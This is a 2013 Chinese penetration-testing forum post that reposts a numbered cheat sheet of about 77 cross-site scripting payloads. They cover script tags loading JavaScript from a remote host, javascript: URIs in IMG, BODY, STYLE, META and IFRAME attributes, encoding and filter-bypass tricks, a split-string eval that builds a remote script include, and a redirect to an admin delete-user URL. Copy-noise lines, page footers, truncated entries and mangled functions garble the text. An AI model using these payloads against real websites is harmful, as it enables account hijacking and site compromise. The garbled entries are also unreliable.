中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
, {4 M8 y% A8 {$ e
(1)普通的XSS JavaScript注入
9 f1 E, J$ z2 d- _; F$ |' H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; h, R* ]4 ^' A) ^$ z" H
(2)IMG标签XSS使用JavaScript命令
a* x3 ~4 e$ t; }3 c9 ]$ j1 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 n. m9 a' a6 l* D
(3)IMG标签无分号无引号
7 I8 c" F9 A3 `; ?' G V$ Y
<IMG SRC=javascript:alert(‘XSS’)>
C- K3 H, Y- d0 {
(4)IMG标签大小写不敏感
/ J, W, w( E- m' [, U: U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 _! Z; y# Y2 @5 j: Z( W4 a* |
(5)HTML编码(必须有分号)
; x9 i" I) O* n: P O
<IMG SRC=javascript:alert(“XSS”)>
. R" \ p- y% U4 O6 s5 \/ x/ @
(6)修正缺陷IMG标签
9 {! m5 a! f" ~, D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. W) O6 _2 W( c2 M; r2 x
6 V1 Y* O4 c, ~4 d" R5 y. f
: b7 C" ?0 p1 O! x; `6 V
(7)formCharCode标签(计算器)
3 M1 k a( [, E6 q0 T) c. \5 }
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; `* ?7 v; `! q
(8)UTF-8的Unicode编码(计算器)
# I% x; ?" v( |6 f$ b' ] J
<IMG SRC=jav..省略..S')>
& `4 g* `7 K7 g
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ l' E: Q$ W, w" J5 V
<IMG SRC=jav..省略..S')>
8 m5 r6 G* _' d, L- w! i
(10)十六进制编码也是没有分号(计算器)
& \# w% o5 M0 `: H" x9 u. U" ?9 C# A
<IMG SRC=java..省略..XSS')>
8 ^9 d" n: u" e7 L9 [
(11)嵌入式标签,将Javascript分开
) x& w2 G2 z" Y9 E* V' m1 R; U
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 |5 b! n* s% M2 E( V2 ^7 ^' B
(12)嵌入式编码标签,将Javascript分开
+ x! d, D1 k7 J: b# J2 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ o9 c! h/ D* a) j6 {4 M. r
(13)嵌入式换行符
! F- i% }6 Z5 l' h) _( G0 J% C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# p6 J5 W7 I# N2 f
(14)嵌入式回车
( ?! _; s' T% Z5 h/ J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; Z: C }5 w8 @& B5 i2 E+ N5 L
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
; L3 \, a+ q" V, c0 ~
<IMG SRC=”javascript:alert(‘XSS‘)”>
- n$ J& O$ D; M; R
(16)解决限制字符(要求同页面)
+ N6 C$ A: B' H! M3 N' g. |
<script>z=’document.’</script>
$ _+ T& j+ _) ~- c9 K
<script>z=z+’write(“‘</script>
& G/ X, k5 \4 P/ a8 e3 n. q5 k
<script>z=z+’<script’</script>
& X# }4 y! _) b
<script>z=z+’ src=ht’</script>
) j9 m' A* N7 {8 G1 n- s1 t% u
<script>z=z+’tp://ww’</script>
& M6 V! n. D5 _0 v0 e
<script>z=z+’w.shell’</script>
# x; W' u, [& ~) w3 s8 Q
<script>z=z+’.net/1.’</script>
. C, [( R; r- {9 d5 z
<script>z=z+’js></sc’</script>
) @6 X$ ^1 H! j- ]( B$ S
<script>z=z+’ript>”)’</script>
" `& M& K* `0 z
<script>eval_r(z)</script>
, ?! v. ]3 ^1 e) ^8 n7 @# [
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
0 u" c8 d$ Q0 ?( i/ u& i
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
, \% v9 X$ r# F: ^0 A" f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; f; b( q: M& P% c) v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( T& ?& J! V( }3 D' U. T& P
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 T6 M* [0 U& X% q7 l: `+ V) i
(19)Spaces和meta前的IMG标签
6 |3 D/ C7 D, I7 O2 T
<IMG SRC=” javascript:alert(‘XSS’);”>
7 [% b" M1 r- U7 I
(20)Non-alpha-non-digit XSS
9 Z `! C) K C
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
5 C. \5 n( u% v5 d: J7 h8 c# V
(21)Non-alpha-non-digit XSS to 2
1 f# o1 M* T% b9 ? t0 d
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ R* s9 y0 k# g, j; Z; S- Q
(22)Non-alpha-non-digit XSS to 3
0 p! A# S( b. u8 Y- A6 Z+ M* D# T
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
4 h8 J1 [0 u- b& l$ _/ b3 C
(23)双开括号
8 m% J! T' V# T( E1 y M G
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ Z& U& M( ?% K9 g8 ], a
(24)无结束脚本标记(仅火狐等浏览器)
$ e0 ?5 Q* X S! \4 T* a2 j
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% P A3 H# B6 h$ c0 r" `
(25)无结束脚本标记2
. S+ i$ g# h4 Y
<SCRIPT SRC=//3w.org/XSS/xss.js>
j* m1 d9 ^0 V7 n. N- _; v
(26)半开的HTML/JavaScript XSS
$ h: G/ _" m/ z( Z; ~# E6 a
<IMG SRC=”javascript:alert(‘XSS’)”
, q% ]" w3 k4 \& n B! b8 U
(27)双开角括号
7 ?, Y) @* i) F0 V/ y# P% k; z
<iframe src=http://3w.org/XSS.html <
; T9 l% @7 m9 x3 T1 E
(28)无单引号 双引号 分号
_8 D) t5 u6 g, D! L h+ [
<SCRIPT>a=/XSS/
" g. H% \; |+ H( ]1 ]: z: w
alert(a.source)</SCRIPT>
' ]7 V8 W$ L# @; v- K; r4 `
(29)换码过滤的JavaScript
8 x. ]" c# i& O2 R
\”;alert(‘XSS’);//
: B6 \. O2 I5 `" E+ z) z
(30)结束Title标签
% c8 r! a" q+ a* h! q% z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% ]7 s4 u. ^# a9 \1 P, I
(31)Input Image
8 |, Q1 x1 X0 b8 c6 q
<INPUT SRC=”javascript:alert(‘XSS’);”>
+ W9 l7 K- T' S( _8 p
(32)BODY Image
' X- t3 {6 w: r* |. q _2 x- G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ Z7 q/ E! w- f
(33)BODY标签
. t$ |: B: X5 B
<BODY(‘XSS’)>
9 B$ V5 z% M+ b3 o; p9 M+ n
(34)IMG Dynsrc
; F+ M) G9 z5 Q# f/ @
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 C |2 I7 ^0 }
(35)IMG Lowsrc
( }. \. {) J v' w: }$ a a. G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 O9 y! ?+ M, w' @8 t
(36)BGSOUND
6 ]5 S0 ?/ E+ a: n8 Y/ _" o
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( k4 U% @7 z; n2 k4 l6 C# G
(37)STYLE sheet
0 ~( _! \3 Q+ W
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 P6 @; ?6 C- Z
(38)远程样式表
' e/ J0 R( F& W! p5 o0 |% I
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
( Y6 J3 F, S8 z
(39)List-style-image(列表式)
8 [3 R+ @& i" O/ K/ j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! R: U* K+ t+ Y* W4 X, z+ D
(40)IMG VBscript
- G3 g: I* o: r+ X) w3 J
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
8 x+ v4 y; c0 z% y8 g+ s
(41)META链接url
0 E- T0 ^: H" j. J' a
& {! l) R/ _2 s5 w0 E
$ I/ u; _/ ^0 V3 \/ ]% ~
<META HTTP-EQUIV=”refresh” CONTENT=”0;
' x P4 m" W5 E$ ]1 ]2 i/ X
URL=http://;URL=javascript:alert(‘XSS’);”>
) J5 f4 ?8 P7 M; L. }( ~
(42)Iframe
9 {8 |- l4 q# _; H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# k* u8 ]( u# |* j" D4 D' X
(43)Frame
+ s5 t8 j: T6 E0 L: o% {- R
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
c/ Y/ y( _8 _* c9 X3 I
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
M1 r) F- D& [& _1 Q
(44)Table
5 R5 c" H5 [* u
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% ?( h% E* H2 O8 c# Y# n
(45)TD
/ d( I/ Q7 w2 P/ [2 a
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- P- Q7 X0 D% v7 J) w
(46)DIV background-image
3 K/ ?( k6 {5 n; M1 g' e4 G+ ?
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% `# D* s3 }/ a' _
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) _" x: j* z N, Q1 ?7 O
8&13&12288&65279)
' B# n9 h+ Y+ G$ P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. P: p+ k3 L& I8 u9 A
(48)DIV expression
. R' ~- g2 e# e7 T) X7 j
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 p2 h- d# u5 \" [) ^! n$ Y
(49)STYLE属性分拆表达
; ?2 N, A9 U: u3 `& U& @
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. U) J( G0 L" ^
(50)匿名STYLE(组成:开角号和一个字母开头)
; l4 V9 _1 X$ G8 F6 h, g
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( F# N$ O% ^, o- J( e
(51)STYLE background-image
1 u# a( G6 ?/ d
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
: h0 G4 @: V5 ]1 ^+ u
CLASS=XSS></A>
8 t0 Q' E4 h; z8 I
(52)IMG STYLE方式
0 N# X* t2 A: P! z
exppression(alert(“XSS”))’>
( }( J1 r1 N: |! i2 D' R) j
(53)STYLE background
( v1 w4 d& n" o$ V* W8 Z
<STYLE><STYLE
8 y9 l3 I7 m: k( N5 G/ o
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% z. _3 F% n: s
(54)BASE
6 l( }' Z/ t* J, S" Y
<BASE HREF=”javascript:alert(‘XSS’);//”>
9 `2 Y: g( s0 D% H9 `4 h9 B! k
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( ]* n7 I2 \7 d: W" o/ @, d
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
9 H6 ]2 Y* T4 z) _' R% W
(56)在flash中使用ActionScrpt可以混进你XSS的代码
, e0 b# k* H/ S
a=”get”;
- J) y8 k- Z: Q9 @
b=”URL(\”";
2 [7 J3 l8 \" f. ~0 [
c=”javascript:”;
6 k. V1 j' m0 L9 N3 H! W
d=”alert(‘XSS’);\”)”;
* i; ~; V; V- d6 {; n) e
eval_r(a+b+c+d);
0 _* W) b5 s8 `( ~
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% [) }$ m1 P1 A' w
<HTML xmlns:xss>
3 r' |* `# C' ]) `) J+ d- q ]' `9 L
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
& S& W4 ]% C6 }
<xss:xss>XSS</xss:xss>
, j; \: G9 M# k, N8 \% S
</HTML>
: I. Z) N r+ w5 b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" S0 i6 z6 X' `% a. `
<SCRIPT SRC=””></SCRIPT>
# g7 n1 L4 m- o' V( h9 w) N
(59)IMG嵌入式命令,可执行任意命令
7 i- D8 O- n: R$ [. W! X* ^
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
' f% s: y' r2 q; o4 t5 B* B( I7 S1 {* N
(60)IMG嵌入式命令(a.jpg在同服务器)
! a: k: M, E5 l, U
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
6 [3 W8 `" k# i/ R/ R, w: Q5 x4 X
(61)绕符号过滤
; v, l5 K2 l3 D1 w# ]# O# `" I
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
0 }7 |4 N- c3 J% E
(62)
% j3 }& T3 e! G9 k9 B
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
3 B' M5 X9 e- w% T6 c0 g
(63)
: N9 s0 i. L8 |1 \ h
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
& F' F' a+ F& n4 ^/ U) R
(64)
i! L7 V* N c- D0 o w
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
6 `4 I/ n$ R$ m) n8 U( n( y
(65)
! @! Z" e6 K6 N; ^# ?
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
+ t) @# M# u0 t" Z! b0 w
(66)12-7-1 T00LS - Powered by Discuz! Board
: x& O6 U8 Y/ t
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
. t% X" O% q0 m8 D
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
( v3 a1 k6 |% H
(67)
+ M. x4 O0 {3 z: X
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
( V% n3 Y# ^) {% _( G; }
</SCRIPT>
. B: l1 x$ }- l( w" }1 E/ {
(68)URL绕行
7 b1 g, j% {4 I) K; q' h
<A HREF=”
http://127.0.0.1/
”>XSS</A>
* t0 m% |) v0 S. k0 x
(69)URL编码
4 e, N) S, a) ~0 {
<A HREF=”
http://3w.org
”>XSS</A>
& P: {1 R" Y7 x3 l$ f% Z! y
(70)IP十进制
1 v. ]' K- U* m7 H/ T0 F
<A HREF=”http://3232235521″>XSS</A>
5 k) z7 P* ^* x! e
(71)IP十六进制
+ Y, \( y- Y8 D5 w( w7 y) n
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
+ V% U. \' h- n% F9 }
(72)IP八进制
) h5 U0 @5 X/ w9 x5 A( S$ h
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
+ S, K1 R% w" {0 G0 r* R( p9 i$ [
(73)混合编码
* @6 ^ b' F8 p o9 @
<A HREF=”h
$ o* V- L8 e0 C% |
tt p://6 6.000146.0×7.147/”">XSS</A>
2 v4 g2 _, l$ W: M8 g1 w( p
(74)节省[http:]
! S( H' r: f, H$ o
<A HREF=”//www.google.com/”>XSS</A>
; u, N1 S& }* ~. W
(75)节省[www]
. F& ]5 F; j; n2 [( B' H
<A HREF=”
http://google.com/
”>XSS</A>
# E* H4 j, i* C8 e8 c
(76)绝对点绝对DNS
/ c* ]4 }# a6 M1 [# J) K( a
<A HREF=”
http://www.google.com./
”>XSS</A>
1 l/ \+ L& a W: Q ^) f
(77)javascript链接
1 E; Z0 z7 s% [: F2 G8 e8 \
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
* W' r# A. F/ ]/ ]9 [! e4 H" y
" c" V( f+ j/ S9 H
原文地址:
http://fuzzexp.org/u/0day/?p=14
5 P* @" Y, ?) V7 k
, B: K9 X$ I, D# z2 {. n' a
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2